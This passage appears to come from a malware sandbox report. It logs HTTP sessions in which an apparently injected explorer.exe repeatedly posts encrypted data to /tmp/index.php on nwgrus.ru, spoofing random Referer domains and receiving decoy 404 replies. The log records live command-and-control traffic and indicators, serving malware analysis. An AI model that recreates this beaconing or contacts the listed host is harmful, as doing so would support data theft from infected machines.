Oct 4, 2024 19:17:34.024066925 CEST	218	OUT	Data Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 4f 35 be 81 Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vuO5K^xvhkwS4rwTZ}c'F(R;0t(:puyGFxA=VeEd]9;),U
Oct 4, 2024 19:17:35.661429882 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Fri, 04 Oct 2024 17:17:35 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49740	177.129.90.106	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 19:17:35.671066046 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://adcijuuyqpoytbg.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 131 Host: nwgrus.ru
Oct 4, 2024 19:17:35.671091080 CEST	131	OUT	Data Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 42 5f a1 f8 Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vuB_tW~ ~D>W7.rq4iyd
Oct 4, 2024 19:17:37.176362038 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 04 Oct 2024 17:17:36 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49741	177.129.90.106	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 19:17:37.185187101 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ynyhgoxksqcqux.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 294 Host: nwgrus.ru
Oct 4, 2024 19:17:37.185203075 CEST	294	OUT	Data Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 48 1f ae b9 Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vuH3OscSEC(.EWigJ0%v(3?aU?[a1\=deI9[q{A/8&y:TkWj<o
Oct 4, 2024 19:17:38.460279942 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Fri, 04 Oct 2024 17:17:38 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49742	177.129.90.106	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 19:17:38.468645096 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://efqngojwjwmo.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 365 Host: nwgrus.ru
Oct 4, 2024 19:17:38.468666077 CEST	365	OUT	Data Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 7e 24 cf f0 Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vu~$qu"Pbj0wfdUJ/7}\-p_Y'h<f4%+>stF2M&7keF}VNA^8kJ,.L9
Oct 4, 2024 19:17:39.742799044 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Fri, 04 Oct 2024 17:17:39 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49743	177.129.90.106	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 19:17:39.751497030 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://slcfgcsbfxfboq.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 313 Host: nwgrus.ru
Oct 4, 2024 19:17:39.751589060 CEST	313	OUT	Data Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 25 44 c2 ee Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vu%D\|TktW&v3FqS-y*EJE_EhQ;Bhj~NN)p`.; D0'wws$VuXq$Sz
Oct 4, 2024 19:17:41.935817957 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 04 Oct 2024 17:17:40 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Oct 4, 2024 19:17:41.936752081 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 04 Oct 2024 17:17:40 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Oct 4, 2024 19:17:41.937155008 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 04 Oct 2024 17:17:40 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49744	177.129.90.106	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 19:17:41.943613052 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://soxhctcejph.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 126 Host: nwgrus.ru
Oct 4, 2024 19:17:41.943629980 CEST	126	OUT	Data Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 2d 47 ea bb Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vu-G_XVo3HfNC*`g>dD
Oct 4, 2024 19:17:43.234663963 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 04 Oct 2024 17:17:42 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49745	177.129.90.106	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 19:17:43.247756958 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://unecmrmecypjdcds.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 233 Host: nwgrus.ru
Oct 4, 2024 19:17:43.247783899 CEST	233	OUT	Data Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 2f 57 af a9 Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vu/WgHuZKai52n)zI^[T5+PA2MwB*"-J8nH<G?xdI89.K'wWS]LVo/
Oct 4, 2024 19:17:44.532157898 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Fri, 04 Oct 2024 17:17:44 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49746	177.129.90.106	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 19:17:44.539654970 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rsqwlptdbkicnj.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 115 Host: nwgrus.ru
Oct 4, 2024 19:17:44.539668083 CEST	115	OUT	Data Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 2d 43 fa eb Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vu-C`{M?C\GpS/
Oct 4, 2024 19:17:46.020754099 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 04 Oct 2024 17:17:45 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49747	177.129.90.106	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 19:17:46.031004906 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qfsgibodkcmgjnhs.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 349 Host: nwgrus.ru
Oct 4, 2024 19:17:46.031042099 CEST	349	OUT	Data Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 25 58 b4 ff Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vu%XFor<ej2<sfQ;'H3$G@H<?.bu'DQKK$RT;KI T]N@kJj6d
Oct 4, 2024 19:17:47.326775074 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 04 Oct 2024 17:17:47 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49748	177.129.90.106	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 19:17:47.334846973 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://iypyxugbhpjfu.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 270 Host: nwgrus.ru
Oct 4, 2024 19:17:47.334862947 CEST	270	OUT	Data Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 79 51 ca 87 Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vuyQQBgEatWa{7r*^_}C(j<9n@/H-,RL\p,'mw2VM@T=z8kIZp:hJ>
Oct 4, 2024 19:17:48.977094889 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 04 Oct 2024 17:17:48 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49749	177.129.90.106	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 19:17:49.184708118 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wckgnkwavbhg.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 115 Host: nwgrus.ru
